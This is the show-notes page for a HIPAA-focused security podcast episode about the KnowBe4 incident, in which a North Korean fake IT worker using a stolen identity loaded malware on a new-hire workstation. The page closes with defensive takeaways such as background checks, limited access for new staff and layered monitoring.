How well do you really know your remote workers? With remote work increasingly becoming the norm, the complexities of securing devices and monitoring access have skyrocketed. The challenges of providing robust security measures for an increasingly dispersed workforce are immense. Real-world examples like the KnowBe4 incident, where a remote worker used a stolen identity to infiltrate company systems, highlight the necessity of layered security and proactive monitoring. Our discussion today, highlights the crucial need to grasp the subtle threats from cyber attackers, especially when dealing with sensitive patient data and HIPAA compliance.
In this episode:
How Well Do You Know Remote Workers? – Ep 470
Today’s Episode is brought to you by:
Kardon
and
HIPAA for MSPs with Security First IT
Subscribe on Apple Podcast. Share us on Social Media. Rate us wherever you find the opportunity.
Great idea! Share Help Me With HIPAA with one person this week!
Learn about offerings from the Kardon Club
and HIPAA for MSPs!
Thanks to our donors. We appreciate your support!
If you would like to donate to the cause you can do that at HelpMeWithHIPAA.com
Like us and leave a review on our Facebook page: www.Facebook.com/HelpMeWithHIPAA
If you see a couple of numbers on the left side you can click that and go directly to that part of the audio. Get the best of both worlds from the show notes to the audio and back!
Thanks to our donors.
405(d) Tip of the Week
[03:38]HHS 405(d) Program Transitions to the Administration for Strategic Preparedness and Response (ASPR)
Administration for Strategic Preparedness and Response (ASPR) is the Sector Risk Management Agency (SRMA) for the HPH Sector so the change makes sense from an organizational perspective. However, it remains to be seen how much of an impact that will have on the productivity of our group. The announcement they did with leaders last week sounded an awful lot like the ones I heard while acquisitions of companies were happening. You know “nothing will change” but deep down everyone knows it will all be upended and start from scratch.
Stay tuned for our thoughts as things progress.
How Well Do You Know Remote Workers?
[07:06]How a North Korean Fake IT Worker Tried to Infiltrate Us
North Korean Fake IT Worker FAQ
Kudos to KnowB4 for announcing this happened and sharing the details. It is only with this kind of transparency we will be able to catch these things before they happen to someone in a more destructive manner. As Stu Sjouwerman said ”If it can happen to us, it can happen to almost anyone”.
Let’s talk about what happened and what you should learn. The good news is that with their advanced monitoring tools and some good old-fashioned human vigilance, they spotted this guy’s unusual activity, and bam! The gig was up.
Oh, while we’re at it, let’s not ignore the broader picture. CISA’s shouting from the rooftops about North Korean cyber threats, especially hitting our healthcare. The DOJ’s even throwing charges at these hackers like confetti trying to find a way to stop them. This is the part everyone always wants to know – why don’t they stop them. Well….. In this case they are in another country that happens to be a hermit nation and a committed adversary of ours.
If it can happen to us
[14:44] From the blog post Incident Report Summary: Insider Threat.TLDR: KnowBe4 needed a software engineer for our internal IT AI team. We posted the job, received resumes, conducted interviews, performed background checks, verified references, and hired the person. We sent them their Mac workstation, and the moment it was received, it immediately started to load malware.
Our HR team conducted four video conference based interviews on separate occasions, confirming the individual matched the photo provided on their application. Additionally, a background check and all other standard pre-hiring checks were performed and came back clear due to the stolen identity being used. This was a real person using a valid but stolen US-based identity. The picture was AI “enhanced”.
The EDR software detected it and alerted our InfoSec Security Operations Center. The SOC called the new hire and asked if they could help. That’s when it got dodgy fast. We shared the collected data with our friends at Mandiant, a leading global cybersecurity expert, and the FBI, to corroborate our initial findings. It turns out this was a fake IT worker from North Korea. The picture you see is an AI fake that started out with stock photography (below). The detail in the following summary is limited because this is an active FBI investigation. Stu Sjouwerman
Why would North Korea want access to KnowB4?
[18:54]There are so many reasons it can make your head spin.
- Email addresses
- Access to domain servers for clients
- Access to phishing emails that worked and who they worked against!
- Ability to launch ransomware attacks through the phishing tests that you are actually running yourself!
The actors also conduct phishing activity using malicious attachments, including Microsoft Windows Shortcut File (LNK) files or HTML Application (HTA) script files inside encrypted or unencrypted zip archives.CISA Alert
With the DOJ announcement we know they have been able to identify specific individuals but will that amount to any punishments effective in deterring them? Doubtful, they are doing this for their country. It is nice to see here they were able to recover some of the money.
If you have the info “leading to the identification or location of any person who, while acting at the direction or under the control of a foreign government, engages in certain malicious cyber activities against U.S. critical infrastructure”, you can get $10 million! Rewards for Justice – Reward Offer for Information on North Korean Malicious Cyber Actor Targeting U.S. Critical Infrastructure – United States Department of State
Big takeaways here
[36:03]- Threat intelligence sharing is essential to our ability to fight these attackers.
- They are funded by their own government but using attacks on our entities to fund themselves plus gain footholds all over the world.
- We are trying to find them and stop them but that is much easier said than done.
- Do your background checks!
- Have layers of security in place and limit access for new staff.
- Do regular security audits.
- Another BOLO example here, too.
The digital landscape is ever-evolving, and so are the tactics of cyber adversaries. The KnowBe4 incident serves as a stark reminder that even the most vigilant organizations can be targeted. Whether your employees are local or remote, limiting access rights is crucial. Just because someone’s been around for years doesn’t mean they need the keys to the entire kingdom. Layered security measures and continuous monitoring can catch suspicious activities before they escalate. Remember, even the most vigilant organizations can be targeted, but by staying proactive and cautious, you can significantly reduce the risks.
Remember to follow us and share us on your favorite social media site. Rate us on your podcasting apps, we need your help to keep spreading the word. As always, send in your questions and ideas!
HIPAA is not about compliance,
it’s about patient care.TM
Special thanks to our sponsors Security First IT and Kardon.
